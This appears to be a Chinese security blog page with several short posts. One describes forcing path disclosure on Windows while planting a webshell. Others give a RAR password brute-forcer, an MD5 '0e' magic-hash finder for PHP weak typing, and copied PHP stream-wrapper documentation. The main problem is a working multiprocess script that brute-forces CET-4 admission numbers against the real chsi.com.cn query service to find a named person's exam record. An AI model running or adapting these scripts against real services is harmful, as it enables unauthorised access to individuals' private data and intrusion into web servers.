something interesting

2018-07-24

最近发现一个奇技淫巧

在一次写shell的时候一时手残，就找到一个我感觉有那么一点点用的东西。

就是这个分号引起了报错，让我们大致能猜到他的文件结构。

思考

开始我以为是php传入时分号的解析短句问题
但是这里是打了引号的，所以和php无关
然后想是不是插入数据库查询的时候出现了问题
会不会是分句执行什么的，但是，报错里面也有分号
说明这个分号是不影响sql语句执行的

实验1

最后我把目光转移到了这个报错上面，很明显这个报错信息很像是文件夹名的问题，那如果这样我们可以试试

/\:*?”<>

这些字符

斜杠测试成功，但是并不能爆出路径

分号反斜杠，这可以说把分号当成了文件名，果然成功爆出路径

单独插入分号当成一个文件名是可以的

当然？会让路由误会，所以也不能当文件名

看下这些实验，得出结论，是文件或文件夹名非法导致报错

实验2

果然这样会使文件名非法而报错（windows）

linux下可以接受这些字符

应用场景

如上，写shell的时候能反馈你信息且为windows的时候。

show all >>

多线程爆破cet4准考号

2018-07-24

#!/usr/bin/python
# -*- coding: UTF-8 -*-
import requests
from multiprocessing import Pool
tit='听'.decode('utf-8')
def ck(url):
    url1='http://www.chsi.com.cn/cet/query?zkzh=5100601711'+str(url)+'&xm=左松林&yzm=11'
    re1 = requests.get(url1)
    try:
        if tit in re1.text:
            print 'find:5100601711'+str(url)
        else:
            print '5100601711'+str(url)+'失败'
    except ZeroDivisionError, e:
        print e.message
    url2 = 'http://www.chsi.com.cn/cet/query?zkzh=5100611711' + str(url) + '&xm=左松林&yzm=11'
    re2 = requests.get(url2)
    try:
        if tit in re2.text:
            print 'find:5100611711' + str(url)
        else:
            print '5100611711' + str(url) + '失败'
    except ConnectionError, e:
        print e.message
if __name__ == "__main__":
    pool=Pool(100)
    f = open('G:\/1234.txt')
    list = []
    for line in f.readlines():
        line = line.strip('\n')
        list.append(line)
    pool.map(ck,list)
    pool.close()
    pool.join()
# u='http://www.chsi.com.cn/cet/query'
# tit='听力'.decode('utf-8')
# for a in range(0,10):
#     for b in range(0, 10):
#         for c in range(0, 10):
#             for d in range(0, 10):
#                 for e in range(0, 10):
#                     get='?zkzh=5100601711'+str(a)+str(b)+str(c)+str(d)+str(e)+'&xm=左松林'
#                     url=u+get
#                     re=requests.get(url)
#                     try:
#                         if tit in re.text:
#                             print 'find:5100601711'+str(a)+str(b)+str(c)+str(d)+str(e)
#                         else:
#                             print '5100601711'+str(a)+str(b)+str(c)+str(d)+str(e)+'失败'
#                     except ZeroDivisionError, e:
#                         print e.message

from multiprocessing import Pool
进程池
multiprocessing模块
看一下Process类的构造方法：
__init__(self, group=None, target=None, name=None, args=(), kwargs={})
参数说明：
group：进程所属组。基本不用
target：表示调用对象。
args：表示调用对象的位置参数元组。
name：别名
kwargs：表示调用对象的字典。
创建进程的简单实例：

#coding=utf-8
import multiprocessing
def do(n) :
  #获取当前线程的名字
  name = multiprocessing.current_process().name
  print name,'starting'
  print "worker ", n
  return
if __name__ == '__main__' :
  numList = []
  for i in xrange(5) :
    p = multiprocessing.Process(target=do, args=(i,))
    numList.append(p)
    p.start()
    p.join()
    print "Process end."

执行结果：
Process-1 starting
worker 0
Process end.
Process-2 starting
worker 1
Process end.
Process-3 starting
worker 2
Process end.
Process-4 starting
worker 3
Process end.
Process-5 starting
worker 4
Process end.
创建子进程时，只需要传入一个执行函数和函数的参数，创建一个Process实例，并用其start()方法启动，这样创建进程比fork()还要简单。
join()方法表示等待子进程结束以后再继续往下运行，通常用于进程间的同步。
注意：
在Windows上要想使用进程模块，就必须把有关进程的代码写在当前.py文件的if __name__ == ‘__main__’ :语句的下面，才能正常使用Windows下的进程模块。Unix/Linux下则不需要。

Pool类

在使用Python进行系统管理时，特别是同时操作多个文件目录或者远程控制多台主机，并行操作可以节约大量的时间。如果操作的对象数目不大时，还可以直接使用Process类动态的生成多个进程，十几个还好，但是如果上百个甚至更多，那手动去限制进程数量就显得特别的繁琐，此时进程池就派上用场了。
Pool类可以提供指定数量的进程供用户调用，当有新的请求提交到Pool中时，如果池还没有满，就会创建一个新的进程来执行请求。如果池满，请求就会告知先等待，直到池中有进程结束，才会创建新的进程来执行这些请求
下面介绍一下multiprocessing 模块下的Pool类下的几个方法

apply()

函数原型：
apply(func[, args=()[, kwds={}]])
该函数用于传递不定参数，主进程会被阻塞直到函数执行结束（不建议使用，并且3.x以后不在出现）。

apply_async()

函数原型：

apply_async(func[, args=()[, kwds={}[, callback=None]]])

与apply用法一样，但它是非阻塞且支持结果返回进行回调。

map()

函数原型：

map(func, iterable[, chunksize=None])

Pool类中的map方法，与内置的map函数用法行为基本一致，它会使进程阻塞直到返回结果。
注意，虽然第二个参数是一个迭代器，但在实际使用中，必须在整个队列都就绪后，程序才会运行子进程。

close()

关闭进程池（pool），使其不在接受新的任务。

terminate()

结束工作进程，不再处理未处理的任务。

join()

主进程阻塞等待子进程的退出，join方法必须在close或terminate之后使用。
multiprocessing.Pool类的实例：

import time
from multiprocessing import Pool
def run(fn):
  #fn: 函数参数是数据列表的一个元素
  time.sleep(1)
  return fn*fn
if __name__ == "__main__":
  testFL = [1,2,3,4,5,6]  
  print 'shunxu:' #顺序执行(也就是串行执行，单进程)
  s = time.time()
  for fn in testFL:
    run(fn)
  e1 = time.time()
  print "顺序执行时间：", int(e1 - s)
  print 'concurrent:' #创建多个进程，并行执行
  pool = Pool(5)  #创建拥有5个进程数量的进程池
  #testFL:要处理的数据列表，run：处理testFL列表中数据的函数
  rl =pool.map(run, testFL)
  pool.close()#关闭进程池，不再接受新的进程
  pool.join()#主进程阻塞等待子进程的退出
  e2 = time.time()
  print "并行执行时间：", int(e2-e1)
  print rl

show all >>

zip(rar)文件口令爆破

2018-07-24

# import zipfile
import rarfile
# def extractfile(zfile,password):
#     try:
#         zfile.extractall(pwd=password)
#         return password
#     except:
#         return 0
def rarextractfile(zfile,password):
    try:
        zfile.extractall(pwd=password)
        return password
    except:
        return 0
def main():
    zfile=rarfile.RarFile('2.rar')
    passfile = open('1.txt')
    # for line in passfile.readlines():
    #     password = line.strip('\n')
    #     guess = extractfile(zfile,password)
    #     if guess:
    #         print '[+] Password = ' + password + '\n'
    #         exit(0)
    #     else:
    #         print '[-] Password = ' + password + '\n'
    for line in passfile.readlines():
        password = line.strip('\n')
        guess = rarextractfile(zfile,password)
        if guess:
            print '[+] Password = ' + password + '\n'
            exit(0)
        else:
            print '[-] errPassword = ' + password + '\n'
if __name__ == "__main__":
    main()

show all >>

md5截断字符串比较爆破

2018-07-24

import hashlib
import re
a = 1
while a < 999999:
    md5 = hashlib.md5((str(a) + 'D0g3').encode()).hexdigest()
    if re.match('^0e\d{8}', md5[2:]):
        print(str(a) + " " + md5 + "\n")
        a += 1
        continue
    a += 1

md5爆破
弱类型

show all >>

zlib,bzip2,zip协议

2018-07-24

zlib:// bzip2:// zip://

zlib:// – bzip2:// – zip:// — 压缩流

说明

zlib: PHP 4.0.4-PHP 4.2.3（仅支持带 fopencookie 的系统）
compress.zlib://和 compress.bzip2://``PHP 4.3.0 及以上
zlib:的功能类似 gzopen()，但是其数据流还能被 fread() 和其他文件系统函数使用。自 PHP 4.3.0 后这个不建议被使用，因为会和其他带“:”字符的文件名混淆;请使用 compress.zlib:// 作为替代。
compress.zlib://,compress.bzip2://和gzopen(),bzopen()是相等的。并且可以在不支持 fopencookie 的系统中使用。
ZIP 扩展注册了 zip: 封装协议。

可选项

compress.zlib://file.gz
compress.bzip2://file.bz2
zip://archive.zip#dir/file.txt

用法 ¶

EXAMPLE

example 1

Example on how to read an entry from a ZIP archive (file “bar.txt” inside “./foo.zip”):
可以读取zip包里的文件

<?php
$fp = fopen('zip://./foo.zip#bar.txt', 'r');
if( $fp ){
    while( !feof($fp) ){
        echo fread($fp, 8192);
    }
    fclose($fp);
}
?>

example 2

One-liners to gzip and ungzip a file:
压缩包和解压包
copy('file.txt','compress.zlib://'.'file.txt.gz');
copy('compress.zlib://'.'file.txt.gz','file.txt');

example 3

show all >>

php协议

2018-07-24

php://

php:// — 访问各个输入/输出流（I/O streams）

说明

PHP 提供了一些杂项输入/输出（IO）流，允许访问 PHP 的输入输出流、标准输入输出和错误描述符，内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。

php://stdin, php://stdout 和 php://stderr

php://stdin、php://stdout 和php://stderr 允许直接访问 PHP 进程相应的输入或者输出流。
数据流引用了复制的文件描述符，所以如果你打开 php://stdin 并在之后关了它，仅是关闭了复制品，真正被引用的 STDIN 并不受影响。
注意 PHP 在这方面的行为有很多 BUG 直到 PHP 5.2.1。推荐你简单使用常量 STDIN、STDOUT 和 STDERR 来代替手工打开这些封装器。
php://stdin 是只读的， php://stdout 和 php://stderr 是只写的。

php://input

php://input是个可以访问请求的原始数据的只读流。 POST 请求的情况下，最好使用 php://input来代替$HTTP_RAW_POST_DATA，因为它不依赖于特定的 php.ini 指令。而且，这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充，比激活 always_populate_raw_post_data 潜在需要更少的内存。 enctype="multipart/form-data"的时候 php://input是无效的。

Note: 在 PHP 5.6 之前 php://input 打开的数据流只能读取一次；数据流不支持 seek 操作。不过，依赖于 SAPI 的实现，请求体数据被保存的时候，它可以打开另一个 php://input 数据流并重新读取。通常情况下，这种情况只是针对POST 请求，而不是其他请求方式，比如 PUT或者 PROPFIND。

php://output

php://output 是一个只写的数据流，允许你以 print 和 echo 一样的方式写入到输出缓冲区。

php://fd

php://fd 允许直接访问指定的文件描述符。例如 php://fd/3 引用了文件描述符 3。

php://memory 和 php://temp

php://memory 和 php://temp 是一个类似文件包装器的数据流，允许读写临时数据。两者的唯一区别是 php://memory 总是把数据储存在内存中，而 php://temp 会在内存量达到预定义的限制后（默认是 2MB）存入临时文件中。临时文件位置的决定和 sys_get_temp_dir() 的方式一致。

php://temp 的内存限制可通过添加 /maxmemory:NN 来控制，NN 是以字节为单位、保留在内存的最大数据量，超过则使用临时文件。

php://filter ¶

php://filter 是一种元封装器，设计用于数据流打开时的筛选过滤应用。这对于一体式（all-in-one）的文件函数非常有用，类似 readfile()、 file() 和file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。
php://filter 目标使用以下的参数作为它路径的一部分。复合过滤链能够在一个路径上指定。详细使用这些参数可以参考具体范例。

可选项

更新日志 ¶

版本	说明
5.6.0	php://input 可反复使用。
5.3.6	增加 php://fd。
5.1.0	增加 php://memory 和 php://temp。
5.0.0	增加 php://filter。

范例 ¶

Example #1
php://temp/maxmemory

这个可选选项允许设置 php://temp 开始使用临时文件前的最大内存限制。

<?php
// Set the limit to 5 MB.
$fiveMBs = 5 * 1024 * 1024;
$fp = fopen("php://temp/maxmemory:$fiveMBs", 'r+');
fputs($fp, "hello\n");
// Read what we have written.
rewind($fp);
echo stream_get_contents($fp);
?>

Example #2
php://filter/resource=<待过滤的数据流>

这个参数必须位于 php://filter 的末尾，并且指向需要过滤筛选的数据流。

<?php
/* 这简单等同于：
  readfile("http://www.example.com");
  实际上没有指定过滤器 */
readfile("php://filter/resource=http://www.example.com");
?>

Example #3
php://filter/read=<读链需要应用的过滤器列表>
这个参数采用一个或以管道符 | 分隔的多个过滤器名称。

<?php
/* 这会以大写字母输出 www.example.com 的全部内容 */
readfile("php://filter/read=string.toupper/resource=http://www.example.com");
/* 这会和以上所做的一样，但还会用 ROT13 加密。 */
readfile("php://filter/read=string.toupper|string.rot13/resource=http://www.example.com");
?>

Example #4
php://filter/write=<写链需要应用的过滤器列表>
这个参数采用一个或以管道符 | 分隔的多个过滤器名称。

<?php
/* 这会通过 rot13 过滤器筛选出字符 "Hello World"
  然后写入当前目录下的 example.txt */
file_put_contents("php://filter/write=string.rot13/resource=example.txt","Hello World");
?>

Example #5
php://memory 和 php://temp 是一次性的
php://memory 和 php://temp 是一次性的，比如：stream 流关闭后，就无法再次得到以前的内容了。

1 2	file_put_contents('php://memory', 'PHP'); echo file_get_contents('php://memory'); // 啥也没有

show all >>

phar协议

2018-07-24

phar://

phar:// — PHP 归档

说明 ¶

phar:// 数据流包装器自 PHP 5.3.0 起开始有效。详细的描述可参见 Phar 数据流包装器。

用法 ¶

phar://

可选项 ¶

封装协议摘要
|属性 |支持
|- |-
|支持 allow_url_fopen |No
|支持 allow_url_include |No
|允许读取 |Yes
|允许写入 |Yes
|允许附加 |No
|允许同时读写 |Yes
|支持 stat() |Yes
|支持 unlink() |Yes
|支持 rename() |Yes
|支持 mkdir() |Yes
|支持 rmdir() |Yes

show all >>

http,https协议

2018-07-24

http://

https://

http:// – https:// — 访问 HTTP(s) 网址

说明

允许通过 HTTP1.0的GET方法，以只读访问文件或资源。
HTTP 请求会附带一个Host:头，用于兼容基于域名的虚拟主机。
如果在你的php.ini文件中或字节流上下文（context）配置了user_agent字符串，它也会被包含在请求之中。
数据流允许读取资源的 body，而 headers 则储存在了

变量里。

如果需要知道文档资源来自哪个URL（经过所有重定向的处理后），需要处理数据流返回的系列响应报头（```response headers```）。
The from directive will be used for the From: header if set and not overwritten by the 上下文（Context）选项和参数.
##### 用法
---
```http://example.com
http://example.com/file.php?var1=val1&var2=val2
http://user:password@example.com
https://example.com
https://example.com/file.php?var1=val1&var2=val2
https://user:password@example.com

可选项

封装协议概要
|属性 | 支持
|- |-
|受 allow_url_fopen 限制|Yes
|允许读取 |Yes
|允许写入 |No
|允许添加 |No
|允许同时读和写 |N/A
|支持 stat() |No
|支持 unlink() |No
|支持 rename() |No
|支持 mkdir() |No
|支持 rmdir() |No

更新日志

版本	说明
4.3.7	检测 IIS 服务器避免 “SSL: Fatal Protocol Error” 错误。
4.3.0	添加 https://。
4.0.5	增加了对重定向的支持。

范例

Example #1 检测重定向后最终的 URL

<?php
$url = 'http://www.example.com/redirecting_page.php';
$fp = fopen($url, 'r');
$meta_data = stream_get_meta_data($fp);
foreach ($meta_data['wrapper_data'] as $response) {
    /* 我们是否被重定向了？ */
    if (strtolower(substr($response, 0, 10)) == 'location: ') {
        /* 更新我们被重定向后的 $url */
        $url = substr($response, 10);
    }
}
?>

注释

Note:openssl扩展启用后才能够支持 HTTPS 协议。
HTTP 连接是只读的;
还不支持对一个HTTP资源进行写数据或者复制文件。
比如发送POST和PUT请求，可以在 HTTP Contexts 的支持下实现。

参见

HTTP context 选项
$http_response_header
stream_get_meta_data()-从封装协议文件指针中取得报头／元数据

User Contributed Notes

<?php
function post_it($datastream, $url) {
$url = preg_replace("@^http://@i", "", $url);
$host = substr($url, 0, strpos($url, "/"));
$uri = strstr($url, "/");
      $reqbody = "";
      foreach($datastream as $key=>$val) {
          if (!empty($reqbody)) $reqbody.= "&";
      $reqbody.= $key."=".urlencode($val);
      }
$contentlength = strlen($reqbody);
     $reqheader =  "POST $uri HTTP/1.1\r\n".
                   "Host: $host\n". "User-Agent: PostIt\r\n".
     "Content-Type: application/x-www-form-urlencoded\r\n".
     "Content-Length: $contentlength\r\n\r\n".
     "$reqbody\r\n";
$socket = fsockopen($host, 80, $errno, $errstr);
if (!$socket) {
   $result["errno"] = $errno;
   $result["errstr"] = $errstr;
   return $result;
}
fputs($socket, $reqheader);
while (!feof($socket)) {
   $result[] = fgets($socket, 4096);
}
fclose($socket);
return $result;
}
?>

Passing authentication information in the URL as in “https://user:password@example.com“ works for HTTP “Basic” access authentication but not for HTTP “Digest” access authentication. You can use the cURL functions for servers requesting HTTP “Digest” access authentication.
“The stream allows access to the body of the resource; the headers are stored in the $http_response_header variable. Since PHP 4.3.0, the headers are available using stream_get_meta_data().”
This one sentence is the only documentation I have found on the mysterious $http_response_header variable, and I’m afraid it’s misleading. It implies that from 4.3.0 onward, stream_get_meta_data() ought to be used in favor of $http_response_header.
Don’t be fooled! stream_get_meta_data() requires a stream reference, which makes it ONLY useful with fopen() and related functions. However, $http_response_header can be used to get the headers from the much simpler file_get_contents() and related functions, which makes it still very useful in 5.x.
Also note that even when file_get_contents() and friends fail due to a 4xx or 5xx error and return false, the headers are still available in $http_response_header.
If you want to send more than one custom header, just make header an array:

<?php
$default_opts = array(
    'http' => array(
        'user_agent' => 'Foobar',
        'header' => array(
            'X-Foo: Bar',
            'X-Bar: Baz'
        )
    )
);
stream_context_get_default($default_opts);
readfile('http://www.xhaus.com/headers');
?>

show all >>

glob协议

2018-07-24

glob://

glob:// — 查找匹配的文件路径模式

说明 ¶

glob: 数据流包装器自 PHP 5.3.0 起开始有效。

用法 ¶

glob://

可选项 ¶

封装协议摘要
|属性 | 支持
|- |-
|受限于 allow_url_fopen |No
|受限于 allow_url_include |No
|允许读取 |No
|允许写入 |No
|允许附加 |No
|允许同时读写 |No
|支持 stat() |No
|支持 unlink() |No
|支持 rename() |No
|支持 mkdir() |No
|支持 rmdir() |No

Example

<?php
// 循环 ext/spl/examples/ 目录里所有 *.php 文件
// 并打印文件名和文件尺寸
$it = new DirectoryIterator("glob://ext/spl/examples/*.php");
foreach($it as $f) {
    printf("%s: %.1FK\n", $f->getFilename(), $f->getSize()/1024);
}
?>

result:
tree.php: 1.0K
findregex.php: 0.6K
findfile.php: 0.7K
dba_dump.php: 0.9K
nocvsdir.php: 1.1K
phar_from_dir.php: 1.0K
ini_groups.php: 0.9K
directorytree.php: 0.9K
dba_array.php: 1.1K
class_tree.php: 1.8K

show all >>

ftp协议

2018-07-24

ftp:// & ftps://

ftp:// – ftps:// — 访问 FTP(s) URLs

说明

允许通过 FTP读取存在的文件，以及创建新文件。如果服务器不支持被动（passive）模式的 FTP，连接会失败。
打开文件后你既可以读也可以写，但是不能同时进行。当远程文件已经存在于ftp 服务器上，如果尝试打开并写入文件的时候，未指定上下文context选项overwrite，连接会失败。如果要通过 FTP覆盖存在的文件，指定上下文context的overwrite选项来打开、写入。另外可使用FTP扩展来代替。
如果你设置了php.ini中的from指令，这个值会作为匿名（anonymous）ftp 的密码。

用法

ftp://example.com/pub/file.txt
ftp://user:password@example.com/pub/file.txt
ftps://example.com/pub/file.txt
ftps://user:password@example.com/pub/file.txt

可选项

封装协议概要
|属性 |PHP 4 | PHP 5
|:———————:|—– |-
|受 allow_url_fopen 影响|Yes |Yes
|允许读取 |Yes |Yes
|允许写入 |Yes(仅支持新文件) |Yes (新文件/启用 overwrite 后已存在的文件)
|允许添加 |No |Yes
|允许同时读和写| No| No
支持 stat()| No| 自 5.0.0 起：仅仅 filesize()、 filetype()、 file_exists()、 is_file() 和 is_dir()。自 PHP 5.1.0 起： filemtime()。
|支持 unlink()| No |Yes
|支持 rename()| No |Yes
|支持 mkdir()| No |Yes
|支持 rmdir()| No |Yes

更新日志

版本	说明
4.3.0	增加 ftps://.

注释

Note:
TPS 仅在 openssl 扩展开启时有效。
如果服务器不支持SSL，这个连接会降级（falls back）到普通未加密的 ftp。
Note: 追加自 PHP 5.0.0 起文件可以通过 ftp:// URL 封装器来追加（append）。在之前的版本，尝试通过 ftp:// 来追加一个文件将会导致错误。

show all >>